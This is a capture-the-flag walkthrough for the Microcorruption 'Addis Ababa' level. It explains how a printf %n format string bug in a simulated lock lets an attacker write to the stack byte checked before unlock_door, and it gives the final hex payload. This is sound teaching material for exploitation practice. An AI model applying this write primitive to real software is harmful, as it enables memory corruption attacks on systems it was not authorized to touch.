Microcorruption 0x0A - Addis Ababa

Prev: 0x09 Santa Cruz
Next: 0x0B Novosibirsk

The manual for this level calls out a new feature: “Usernames are printed back to the user for verification.” Prior levels did this for both the username and password, so why is this being called out as a new?


Well, if we take a look in “main” we see that strings are now outputted with “printf” as opposed to “puts.” Now, depending on your experience with binary exploits, this may or may not jump out at you, but I’ll assume no prior knowledge and we’ll start by comparing the two functions.

If we hop back into the last level, we can see that “puts” is a fairly simple function with ~20 instructions: it takes the address of a string, iterates over each byte checking for null, and if the byte is not null it calls INT 0 which according to the lock manual is the “putchar” interrupt which prints a single character to the display. If the byte is null (indicating the end of the string), the function exits. Got it.

“printf,” however, is a different beast: it contains over 100 instructions! Instead of walking through it line-by-line, if we give it a quick scan we notice several compares that seem to be dictating the flow. Specifically, there’s an initial “cmp.b” with “0x25,” the ASCII hex value for “%.” Then, there are some other “cmp.b” instructions that compare other hex values which translate to the ASCII characters “s,” “x,” “c,” and “n.” These are the "conversion specifiers," AKA ways to format the output, hence the "f" in "printf" which stands for "format."

Fortunately, “printf” has a good overview in the lock manual so we don’t have to reverse-engineer these ourselves:


Surely this new function is the focus of the level, so how can we exploit it? Let’s first try to understand the remaining program flow so we can understand our objective.


Continuing beyond the “printf” call at 447c (which is used to print our string to the console), we see a “tst 0x0(sp)” which checks whether the current stack pointer is zero. If it is, we jump to an error message and exit. If not, we go to our favorite “unlock_door” function. So, to exploit the program and unlock the door, we can either do what we've done in previous levels and try to overwrite a saved return address on the stack with the address of this “unlock_door” function, or we can overwrite the null byte at address 4288, which is where sp is pointing during the aforementioned “tst” instruction.

If we look at the explanation for “printf,” it’s not readily apparent whether any of these conversion characters will aid us in either pursuit, but our prior exploit research helps us to recognize “%n” as having a role in the (now fairly uncommon) format string exploits, so let's use that as our starting point. Let’s break after the “cmp.b #0x6e” instruction at 46b2 (which checks if our modifier after the "%" is "n"), run the program, and enter the string “AA%n” when prompted.

Already, the first instruction "mov @r9, r15" doesn't mean much to us. If we check r9, we find the stack address "4272," which is where sp is pointing as well. That value - currently null - is placed into r15. Then, in the following instruction, the value in r10 is placed into that address. Inspecting r10, we can see that it's 0x4, so r10 must hold the current count of characters read into printf thus far, which matches the explanation of the "%n" conversion character from the manual.

Continuing, we can see that r9 is incremented, and then the next character of our input is tested to see if it's zero, exiting the program if it is. But wait, r9 was incremented, and we can't see anywhere else that it was used within this function. If we enter "%n" a second time, will the "mov @r9, r15" and "mov r10, 0x0(r15)" instructions write to the next address on the stack - 4276? And if we enter "%n" even more, will r9 continue to be incremented until we eventually reach the address of our string, meaning that we can write to whatever address we provide - such as 4288, the byte that's tested prior to calling "unlock_door?"


In theory, this could work, but we're not sure yet how "printf" will handle additional conversion characters. Let's first enter two "%n" to observe what happens. We'll break at the 0x6e comparison at 46b2 and run the program with "AA%n%n" as our input. When we hit the break, we notice something different than we expected:


At this point, r9 is still equivalent to sp, though it is about to be incremented to 4272, meaning that @r9 is... "4141?" The first two bytes of our string?

This is actually extremely fortunate for us! The first two bytes of our string are copied to where r9 is pointing (4272) after "%n" is processed once. But will it still process the second "%n" and attempt to write to that address?

Yes! If we finish running the program, we see that the program attempts the two "mov @r9, r15" and "mov r10, 0x0(r15)" instructions and crashes, since it cannot write a value in 4141. If we resubmit our input, but replace "AA" with the address 4288, we'll write 0x2 to that address, pass the test on that byte (instruction at address 448a) and unlock the door!

Enter "8842256e256e" as your hex input, and we're in! ("0x256e" is the hex equivalent of the ASCII "%n")

Prev: 0x09 Santa Cruz
Next: 0x0B Novosibirsk